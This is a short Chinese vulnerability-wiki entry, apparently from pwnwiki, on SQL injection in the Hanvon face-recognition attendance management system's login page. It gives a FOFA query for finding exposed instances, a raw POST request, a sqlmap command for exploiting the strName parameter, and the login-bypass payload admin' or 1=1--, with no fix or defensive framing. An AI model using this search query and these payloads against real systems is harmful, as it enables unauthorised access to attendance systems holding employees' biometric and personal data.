免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
FOFA
title="汉王人脸考勤管理系统"
漏洞利用
请求包如下:
POST /Login/Check HTTP/1.1 Host: x.x.x.x Content-Length: 27 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://x.x.x.x:8088 Referer: http://x.x.x.x:8088/Login/Index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: ASP.NET_SessionId=otvxgfy0csmrw4i5y5t24oo1 Connection: close strName=admin&strPwd=123456
其中strName参数存在注入
sqlmap -r postwang.txt -p strName --current-user
万能密码绕过登录
user: admin' or 1=1-- pass: admin
PWNWIK.COM==免费、自由、人人可编辑的漏洞库